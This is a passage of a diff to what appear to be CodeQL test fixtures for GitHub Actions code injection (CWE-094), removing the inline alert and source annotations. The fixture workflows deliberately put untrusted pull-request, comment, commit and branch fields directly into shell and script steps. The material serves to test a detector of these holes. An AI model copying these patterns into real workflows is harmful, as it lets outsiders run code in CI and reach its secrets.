github.event.pull_request.body }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml index 01af6deeaf20..d4ce78856694 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml @@ -4,11 +4,11 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.review.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.title }}' + - run: echo '${{ github.event.pull_request.body }}' + - run: echo '${{ github.event.pull_request.head.label }}' + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' + - run: echo '${{ github.event.pull_request.head.repo.description }}' + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' + - run: echo '${{ github.event.pull_request.head.ref }}' + - run: echo '${{ github.event.review.body }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml index 1b08e4a18550..5d288caad85d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml @@ -4,11 +4,11 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.comment.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.title }}' + - run: echo '${{ github.event.pull_request.body }}' + - run: echo '${{ github.event.pull_request.head.label }}' + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' + - run: echo '${{ github.event.pull_request.head.repo.description }}' + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' + - run: echo '${{ github.event.pull_request.head.ref }}' + - run: echo '${{ github.event.comment.body }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml index da99a837568e..4ca3753f50cd 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml @@ -6,12 +6,12 @@ jobs: steps: - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, so we should not report it - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, so we should not report it - - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.head_ref }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.title }}' + - run: echo '${{ github.event.pull_request.body }}' + - run: echo '${{ github.event.pull_request.head.label }}' + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' + - run: echo '${{ github.event.pull_request.head.repo.description }}' + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' + - run: echo '${{ github.event.pull_request.head.ref }}' + - run: echo '${{ github.head_ref }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml index 97dfeb05c81b..2006a7999daf 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml @@ -4,13 +4,13 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.commits[11].message }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.commits[11].author.email }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.commits[11].author.name }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.message }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.author.email }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.author.name }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.committer.email }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.committer.name }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.commits[11].committer.email }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.commits[11].committer.name }}' # $ Alert[actions/code-injection/medium] \ No newline at end of file + - run: echo '${{ github.event.commits[11].message }}' + - run: echo '${{ github.event.commits[11].author.email }}' + - run: echo '${{ github.event.commits[11].author.name }}' + - run: echo '${{ github.event.head_commit.message }}' + - run: echo '${{ github.event.head_commit.author.email }}' + - run: echo '${{ github.event.head_commit.author.name }}' + - run: echo '${{ github.event.head_commit.committer.email }}' + - run: echo '${{ github.event.head_commit.committer.name }}' + - run: echo '${{ github.event.commits[11].committer.email }}' + - run: echo '${{ github.event.commits[11].committer.name }}' \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml index f459b9b51499..8b7a6df009c2 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml @@ -6,13 +6,13 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.commits[11].message }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.commits[11].author.email }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.commits[11].author.name }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.message }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.author.email }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.author.name }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.committer.email }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.committer.name }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.commits[11].committer.email }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.commits[11].committer.name }}' # $ Alert[actions/code-injection/medium] \ No newline at end of file + - run: echo '${{ github.event.commits[11].message }}' + - run: echo '${{ github.event.commits[11].author.email }}' + - run: echo '${{ github.event.commits[11].author.name }}' + - run: echo '${{ github.event.head_commit.message }}' + - run: echo '${{ github.event.head_commit.author.email }}' + - run: echo '${{ github.event.head_commit.author.name }}' + - run: echo '${{ github.event.head_commit.committer.email }}' + - run: echo '${{ github.event.head_commit.committer.name }}' + - run: echo '${{ github.event.commits[11].committer.email }}' + - run: echo '${{ github.event.commits[11].committer.name }}' \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml index 34c2f156a099..0c4aa93c7a58 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml @@ -33,7 +33,7 @@ jobs: next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: - - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/medium] + - run: echo "${{ inputs.taint }}" - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} @@ -41,8 +41,8 @@ jobs: id: update uses: actions/github-script@v6 env: - log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/medium] - prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/medium] + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' with: result-encoding: string script: | @@ -50,7 +50,7 @@ jobs: const file = './${{ env.file }}'; let content = fs.readFileSync(file).toString(); const title = '[${{ env.next_version }}]'; - const log = '${{ env.log }}'; # $ Alert[actions/code-injection/medium] + const log = '${{ env.log }}'; let exists = ${{ needs.changelog.result == 'success' }}; if (!content.includes(title)) { @@ -63,7 +63,7 @@ jobs: const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; if (exists && ${{ github.event.action == 'edited' }}) { - const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/medium] + const prevLog = '${{ env.prev_log }}'; const index = content.indexOf(prevLog, insertAt); if (index > -1) { content = content.slice(0, index) + content.slice(index + prevLog.length); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml index 333af0376ca0..0c4aa93c7a58 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml @@ -33,7 +33,7 @@ jobs: next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: - - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ inputs.taint }}" - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} @@ -41,8 +41,8 @@ jobs: id: update uses: actions/github-script@v6 env: - log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] - prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' with: result-encoding: string script: | @@ -50,7 +50,7 @@ jobs: const file = './${{ env.file }}'; let content = fs.readFileSync(file).toString(); const title = '[${{ env.next_version }}]'; - const log = '${{ env.log }}'; # $ Alert[actions/code-injection/critical] + const log = '${{ env.log }}'; let exists = ${{ needs.changelog.result == 'success' }}; if (!content.includes(title)) { @@ -63,7 +63,7 @@ jobs: const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; if (exists && ${{ github.event.action == 'edited' }}) { - const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/critical] + const prevLog = '${{ env.prev_log }}'; const index = content.indexOf(prevLog, insertAt); if (index > -1) { content = content.slice(0, index) + content.slice(index + prevLog.length); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml index 3ef3f09bf563..a237856b6ce7 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml @@ -8,4 +8,4 @@ jobs: permissions: {} uses: ./.github/workflows/reusable-workflow-1.yml with: - taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/medium] + taint: ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml index e4c6ec031442..0f87d1e9394f 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml @@ -7,4 +7,4 @@ jobs: test: uses: ./.github/workflows/reusable-workflow-2.yml with: - taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] + taint: ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml index 4ef27dca557e..39dfafcf023e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml @@ -7,4 +7,4 @@ jobs: test: uses: TestOrg/TestRepo/.github/workflows/reusable-workflow.yml@main with: - taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] + taint: ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml index 087b116464e5..5390612f105d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml @@ -13,8 +13,8 @@ jobs: - id: source uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['comment']['body'] }} # $ Source[actions/code-injection/critical] + source: ${{ github.event['comment']['body'] }} find: 'foo' replace: '' - - run: ${{ steps.source.outputs.value }} # $ Alert[actions/code-injection/critical] - - run: ${{ needs.test1.outputs.job_output }} # $ Alert[actions/code-injection/critical] + - run: ${{ steps.source.outputs.value }} + - run: ${{ needs.test1.outputs.job_output }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml index 78f5c845d04d..94e8be89bdc6 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml @@ -8,12 +8,12 @@ jobs: - id: summary uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event.head_commit.message }} # $ Source[actions/code-injection/medium] + source: ${{ github.event.head_commit.message }} find: 'foo' replace: '' - id: flow run: | - echo "${{steps.summary.outputs.value}}" # $ Alert[actions/code-injection/medium] + echo "${{steps.summary.outputs.value}}" - id: no-flow run: | echo "${{steps.summary.outputs.foo}}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml index d1c7dedaa10e..8271f93d857f 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml @@ -15,7 +15,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files # $ Source[actions/code-injection/critical] + - name: Remove foo from changed files id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -26,7 +26,7 @@ jobs: - name: List all changed files id: sink run: | - for file in ${{ steps.step.outputs.value }}; do # $ Alert[actions/code-injection/critical] + for file in ${{ steps.step.outputs.value }}; do echo "$file was changed" done diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml index e08ab1a84556..3128aacc93ce 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml @@ -17,7 +17,7 @@ jobs: steps: - name: Echo trigger run: | - echo "head branch: ${{ github.event.workflow_run.head_branch }}" # $ Alert[actions/code-injection/critical] + echo "head branch: ${{ github.event.workflow_run.head_branch }}" cat << EOF - ${{ toJSON(github.event) }} # $ Alert[actions/code-injection/critical] + ${{ toJSON(github.event) }} EOF diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml index 1eb2797e31bc..5422ac4e9876 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml @@ -17,5 +17,5 @@ jobs: repo-token: ${{ env.GH_TOKEN }} permission-level: read - - run: echo "${{ steps.command.outputs.command-arguments }}" # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical] + - run: echo "${{ steps.command.outputs.command-arguments }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index 6d29df909559..5aeb9aac7c52 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -17,7 +17,7 @@ jobs: - id: step0 uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['pull_request']['body'] }} # $ Source[actions/code-injection/critical] + source: ${{ github.event['pull_request']['body'] }} find: 'foo' replace: '' - id: step1 @@ -49,4 +49,4 @@ jobs: needs: job1 steps: - - run: echo ${{needs.job1.outputs['job_output']}} # $ Alert[actions/code-injection/critical] + - run: echo ${{needs.job1.outputs['job_output']}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml index b58a9cb0aa26..d149df2bd7ca 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml @@ -20,10 +20,10 @@ jobs: - name: Extract Jira Key env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: echo ISSUE_KEY=$(echo "$TITLE") >> $GITHUB_ENV - name: Sink - run: echo ${{ env.ISSUE_KEY }} # $ Alert[actions/code-injection/critical] + run: echo ${{ env.ISSUE_KEY }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml index 9cbfa20a6a27..2e734076cb71 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml @@ -54,7 +54,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -144,7 +144,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -237,7 +237,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -330,7 +330,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -420,7 +420,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -515,7 +515,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml index 151ae685df87..dc101c769449 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml @@ -27,7 +27,7 @@ jobs: name: event_file path: artifacts/event_file - - name: Try to read PR number # $ Source[actions/code-injection/critical] + - name: Try to read PR number id: set-ref run: | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) @@ -51,6 +51,6 @@ jobs: actions: read statuses: write steps: - - run: echo ${{ needs.get-artifacts.outputs.pr_num }} # $ Alert[actions/code-injection/critical] - - run: echo ${{ needs.get-artifacts.outputs.ref }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ needs.get-artifacts.outputs.pr_num }} + - run: echo ${{ needs.get-artifacts.outputs.ref }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml index e141ea55a115..f81bef89568f 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test12.yml @@ -7,7 +7,7 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.pull_request.title || "foo" }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ github.event.pull_request.title || "foo" }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml index 876141d0e17c..1e5c7eec177d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml @@ -7,8 +7,8 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.changes.body.from }}" # $ Alert[actions/code-injection/critical] - - run: echo "${{ github.event.changes.title.from }}" # $ Alert[actions/code-injection/critical] - - run: echo "${{ github.event.changes.head.ref.from }}" # $ Alert[actions/code-injection/critical] - - run: echo "${{ toJson(github.event.changes) }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ github.event.changes.body.from }}" + - run: echo "${{ github.event.changes.title.from }}" + - run: echo "${{ github.event.changes.head.ref.from }}" + - run: echo "${{ toJson(github.event.changes) }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml index df3dd6e8a11a..6d925a82d372 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml @@ -12,8 +12,8 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.changed-files.outputs.files }}" # $ Alert[actions/code-injection/critical] + echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.changed-files.outputs.files }}" test2: runs-on: ubuntu-latest steps: @@ -23,8 +23,8 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "files=${FILES}" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.changed-files.outputs.files }}" # $ Alert[actions/code-injection/critical] + echo "files=${FILES}" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.changed-files.outputs.files }}" test3: runs-on: ubuntu-latest steps: @@ -33,8 +33,8 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] - - run: echo "${{ env.CHANGED-FILES }}" # $ Alert[actions/code-injection/critical] + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" test4: runs-on: ubuntu-latest steps: @@ -44,8 +44,8 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] - - run: echo "${{ env.CHANGED-FILES }}" # $ Alert[actions/code-injection/critical] + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml index bc06e8a525d8..a39967760e8e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml @@ -9,30 +9,30 @@ jobs: steps: - id: title run: | - echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title.outputs.title }}" # $ Alert[actions/code-injection/critical] + echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title }}" test2: runs-on: ubuntu-latest steps: - id: title run: | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) - echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title.outputs.title }}" # $ Alert[actions/code-injection/critical] + echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title }}" test3: runs-on: ubuntu-latest steps: - id: title run: | - echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" # $ Source[actions/code-injection/critical] - - run: echo "${{ env.TITLE }}" # $ Alert[actions/code-injection/critical] + echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" + - run: echo "${{ env.TITLE }}" test4: runs-on: ubuntu-latest steps: - id: title run: | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) - echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" # $ 